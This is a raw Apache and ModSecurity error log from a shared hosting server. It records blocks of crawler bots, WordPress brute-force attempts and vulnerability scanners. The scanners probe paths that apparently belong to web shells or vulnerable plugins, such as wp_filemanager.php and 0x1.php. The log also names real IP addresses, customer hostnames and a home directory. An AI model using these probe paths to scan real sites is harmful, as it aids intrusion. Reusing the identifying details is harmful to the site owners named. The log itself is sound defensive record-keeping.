[Tue May 26 17:46:24.479538 2026] [security2:error] [pid 924957:tid 925100] [client 198.244.242.150:27064] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "landsonlogistics.com"] [uri "/robots.txt"] [unique_id "ahWPGOYv2AvxeXULfJdojwAAAA0"]
[Tue May 26 17:46:24.495788 2026] [security2:error] [pid 924957:tid 925097] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPGOYv2AvxeXULfJdohwAAAAo"]
[Tue May 26 17:46:25.881740 2026] [proxy:warn] [pid 924957:tid 925210] [client 103.123.226.10:61001] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 17:46:26.441430 2026] [security2:error] [pid 924957:tid 925113] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPGuYv2AvxeXULfJdovAAAABo"]
[Tue May 26 17:46:27.089216 2026] [security2:error] [pid 924957:tid 925104] [client 103.123.226.10:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWPGeYv2AvxeXULfJdotwAAABE"]
[Tue May 26 17:46:27.089849 2026] [security2:error] [pid 924957:tid 925210] [client 103.123.226.10:61001] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahWPGeYv2AvxeXULfJdotQAAAHs"]
[Tue May 26 17:46:28.402425 2026] [security2:error] [pid 924957:tid 925097] [client 104.28.118.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWPHOYv2AvxeXULfJdpBgAAAAo"]
[Tue May 26 17:46:28.588789 2026] [security2:error] [pid 924957:tid 925130] [client 3.136.26.66:11611] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPHOYv2AvxeXULfJdpBwAAACs"]
[Tue May 26 17:46:28.671882 2026] [security2:error] [pid 924957:tid 925019] [remote 168.63.79.147:58674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPHOYv2AvxeXULfJdpCAAAcT0"]
[Tue May 26 17:46:29.046700 2026] [security2:error] [pid 924957:tid 925090] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPHOYv2AvxeXULfJdpFAAAAAM"]
[Tue May 26 17:46:30.999587 2026] [security2:error] [pid 924957:tid 925189] [client 130.51.20.151:49746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.20.51.130.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWPHuYv2AvxeXULfJdpXQAAAGY"], referer: https://www.cagmedya.com/aksaray-web-tasarim/
[Tue May 26 17:46:30.999726 2026] [security2:error] [pid 924957:tid 925189] [client 130.51.20.151:49746] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWPHuYv2AvxeXULfJdpXQAAAGY"], referer: https://www.cagmedya.com/aksaray-web-tasarim/
[Tue May 26 17:46:31.239592 2026] [security2:error] [pid 924957:tid 925208] [client 198.244.226.21:37014] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "landsonlogistics.com"] [uri "/"] [unique_id "ahWPH-Yv2AvxeXULfJdpawAAAHk"]
[Tue May 26 17:46:31.239710 2026] [security2:error] [pid 924957:tid 925208] [client 198.244.226.21:37014] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "landsonlogistics.com"] [uri "/"] [unique_id "ahWPH-Yv2AvxeXULfJdpawAAAHk"]
[Tue May 26 17:46:31.631178 2026] [security2:error] [pid 924957:tid 925131] [client 130.51.20.151:49770] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWPH-Yv2AvxeXULfJdpbwAAACw"], referer: https://www.cagmedya.com/aksaray-web-tasarim/
[Tue May 26 17:46:31.651005 2026] [security2:error] [pid 924957:tid 925167] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPH-Yv2AvxeXULfJdpagAAAFA"]
[Tue May 26 17:46:33.498877 2026] [security2:error] [pid 924957:tid 925173] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPIeYv2AvxeXULfJdpnQAAAFY"]
[Tue May 26 17:46:33.803552 2026] [security2:error] [pid 924957:tid 925139] [client 106.195.90.251:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPIeYv2AvxeXULfJdppQAAADQ"]
[Tue May 26 17:46:33.986284 2026] [security2:error] [pid 924957:tid 925141] [client 3.136.26.66:17160] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPIeYv2AvxeXULfJdptwAAADY"]
[Tue May 26 17:46:36.086667 2026] [security2:error] [pid 924957:tid 925111] [client 85.208.96.198:34816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWPJOYv2AvxeXULfJdp7wAAABg"]
[Tue May 26 17:46:36.086854 2026] [security2:error] [pid 924957:tid 925111] [client 85.208.96.198:34816] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWPJOYv2AvxeXULfJdp7wAAABg"]
[Tue May 26 17:46:36.201712 2026] [security2:error] [pid 924957:tid 925179] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPI-Yv2AvxeXULfJdp6AAAAFw"]
[Tue May 26 17:46:36.422620 2026] [security2:error] [pid 924957:tid 925200] [client 114.119.156.102:22525] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "adityacreations.co.in"] [uri "/adityacreations-website-terms.php"] [unique_id "ahWPJOYv2AvxeXULfJdp-AAAAHE"], referer: http://adityacreations.co.in/adityacreations-website-terms.php
[Tue May 26 17:46:38.578024 2026] [security2:error] [pid 924957:tid 925112] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPJuYv2AvxeXULfJdqKQAAABk"]
[Tue May 26 17:46:38.763712 2026] [security2:error] [pid 924957:tid 925097] [client 3.136.26.66:52818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPJuYv2AvxeXULfJdqLQAAAAo"]
[Tue May 26 17:46:40.755444 2026] [security2:error] [pid 924957:tid 925133] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPKOYv2AvxeXULfJdqXgAAAC4"]
[Tue May 26 17:46:40.834402 2026] [security2:error] [pid 924957:tid 925125] [client 47.238.167.218:49806] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "jkjuice.com"] [uri "/"] [unique_id "ahWPKOYv2AvxeXULfJdqaAAAACY"]
[Tue May 26 17:46:41.420378 2026] [security2:error] [pid 924957:tid 925113] [client 114.119.142.132:23213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.lifestylemne.me"] [uri "/"] [unique_id "ahWPKeYv2AvxeXULfJdqdgAAABo"], referer: https://www.lifestylemne.me/
[Tue May 26 17:46:43.212346 2026] [security2:error] [pid 924957:tid 925195] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPKuYv2AvxeXULfJdqqAAAAGw"]
[Tue May 26 17:46:44.652136 2026] [security2:error] [pid 924957:tid 925210] [client 3.136.26.66:16771] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPLOYv2AvxeXULfJdqygAAAHs"]
[Tue May 26 17:46:45.181755 2026] [security2:error] [pid 924957:tid 925140] [client 123.17.30.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPLOYv2AvxeXULfJdq1gAAADU"]
[Tue May 26 17:46:45.551007 2026] [security2:error] [pid 924957:tid 925093] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPLeYv2AvxeXULfJdq3AAAAAY"]
[Tue May 26 17:46:47.486160 2026] [security2:error] [pid 924957:tid 925202] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPL-Yv2AvxeXULfJdrFAAAAHM"]
[Tue May 26 17:46:49.104264 2026] [security2:error] [pid 924957:tid 925114] [client 3.136.26.66:7695] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPMOYv2AvxeXULfJdrPQAAABs"]
[Tue May 26 17:46:49.698381 2026] [security2:error] [pid 924957:tid 925158] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPMeYv2AvxeXULfJdrTQAAAEc"]
[Tue May 26 17:46:53.360069 2026] [security2:error] [pid 924957:tid 925102] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPNOYv2AvxeXULfJdrswAAAA8"]
[Tue May 26 17:46:53.473404 2026] [security2:error] [pid 924957:tid 925189] [client 45.205.1.28:56030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodrc.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahWPNeYv2AvxeXULfJdryQAAAGY"]
[Tue May 26 17:46:53.504985 2026] [security2:error] [pid 924957:tid 925153] [client 3.136.26.66:12997] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPNeYv2AvxeXULfJdrvwAAAEI"]
[Tue May 26 17:46:53.841602 2026] [security2:error] [pid 924957:tid 924976] [remote 103.145.62.145:3858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWPNeYv2AvxeXULfJdrygAAHxI"]
[Tue May 26 17:46:54.890101 2026] [security2:error] [pid 924957:tid 925129] [client 207.174.214.47:39690] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/wp-cron.php"] [unique_id "ahWPNuYv2AvxeXULfJdr6QAAACo"]
[Tue May 26 17:46:54.977258 2026] [security2:error] [pid 924957:tid 925125] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPNuYv2AvxeXULfJdr4gAAACY"]
[Tue May 26 17:46:55.318658 2026] [security2:error] [pid 924957:tid 925095] [client 198.98.56.118:54609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.56.98.198.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahWPNuYv2AvxeXULfJdr6gAAAAg"]
[Tue May 26 17:46:56.090558 2026] [security2:error] [pid 924957:tid 924984] [remote 103.91.67.202:25742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWPN-Yv2AvxeXULfJdsAwAAIxo"]
[Tue May 26 17:46:56.782575 2026] [security2:error] [pid 924957:tid 925151] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPOOYv2AvxeXULfJdsEgAAAEA"]
[Tue May 26 17:46:59.231456 2026] [security2:error] [pid 924957:tid 925159] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPOuYv2AvxeXULfJdsTwAAAEg"]
[Tue May 26 17:47:01.527957 2026] [security2:error] [pid 924957:tid 925166] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPPeYv2AvxeXULfJdsdwAAAE8"]
[Tue May 26 17:47:04.631652 2026] [security2:error] [pid 924957:tid 925145] [client 3.136.26.66:63361] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPQOYv2AvxeXULfJds0AAAADo"]
[Tue May 26 17:47:04.654079 2026] [security2:error] [pid 924957:tid 925169] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPQOYv2AvxeXULfJdsyQAAAFI"]
[Tue May 26 17:47:06.181817 2026] [security2:error] [pid 924957:tid 925171] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPQeYv2AvxeXULfJds-AAAAFQ"]
[Tue May 26 17:47:06.708213 2026] [security2:error] [pid 924957:tid 925007] [remote 103.230.156.120:43718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPQuYv2AvxeXULfJdtAgAATDE"]
[Tue May 26 17:47:08.543528 2026] [security2:error] [pid 924957:tid 925130] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPROYv2AvxeXULfJdtMQAAACs"]
[Tue May 26 17:47:08.650982 2026] [security2:error] [pid 924957:tid 925114] [client 4.228.83.111:45159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWPROYv2AvxeXULfJdtOAAAABs"]
[Tue May 26 17:47:08.651144 2026] [security2:error] [pid 924957:tid 925114] [client 4.228.83.111:45159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWPROYv2AvxeXULfJdtOAAAABs"]
[Tue May 26 17:47:09.053130 2026] [security2:error] [pid 924957:tid 925166] [client 3.136.26.66:47437] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPROYv2AvxeXULfJdtPwAAAE8"]
[Tue May 26 17:47:10.182317 2026] [security2:error] [pid 924957:tid 925101] [client 4.228.83.111:45135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahWPRuYv2AvxeXULfJdtXgAAAA4"]
[Tue May 26 17:47:10.182448 2026] [security2:error] [pid 924957:tid 925101] [client 4.228.83.111:45135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahWPRuYv2AvxeXULfJdtXgAAAA4"]
[Tue May 26 17:47:11.301373 2026] [security2:error] [pid 924957:tid 925135] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPRuYv2AvxeXULfJdtcAAAADA"]
[Tue May 26 17:47:13.081943 2026] [autoindex:error] [pid 924957:tid 925157] [client 170.106.35.153:54424] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:47:13.362135 2026] [security2:error] [pid 924957:tid 925137] [client 3.136.26.66:38238] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWPSeYv2AvxeXULfJdtowAAADI"]
[Tue May 26 17:47:13.499656 2026] [security2:error] [pid 924957:tid 925115] [client 4.228.83.111:45152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahWPSeYv2AvxeXULfJdtswAAABw"]
[Tue May 26 17:47:13.499773 2026] [security2:error] [pid 924957:tid 925115] [client 4.228.83.111:45152] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahWPSeYv2AvxeXULfJdtswAAABw"]
[Tue May 26 17:47:13.756272 2026] [security2:error] [pid 924957:tid 925111] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPSeYv2AvxeXULfJdtrAAAABg"]
[Tue May 26 17:47:15.312683 2026] [security2:error] [pid 924957:tid 925196] [client 4.228.83.111:45180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/public/css.php"] [unique_id "ahWPS-Yv2AvxeXULfJdt5wAAAG0"]
[Tue May 26 17:47:15.312791 2026] [security2:error] [pid 924957:tid 925196] [client 4.228.83.111:45180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/public/css.php"] [unique_id "ahWPS-Yv2AvxeXULfJdt5wAAAG0"]
[Tue May 26 17:47:16.076534 2026] [security2:error] [pid 924957:tid 925194] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPS-Yv2AvxeXULfJdt7gAAAGs"]
[Tue May 26 17:47:17.011171 2026] [security2:error] [pid 924957:tid 925100] [client 165.165.108.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPTOYv2AvxeXULfJduCwAAAA0"]
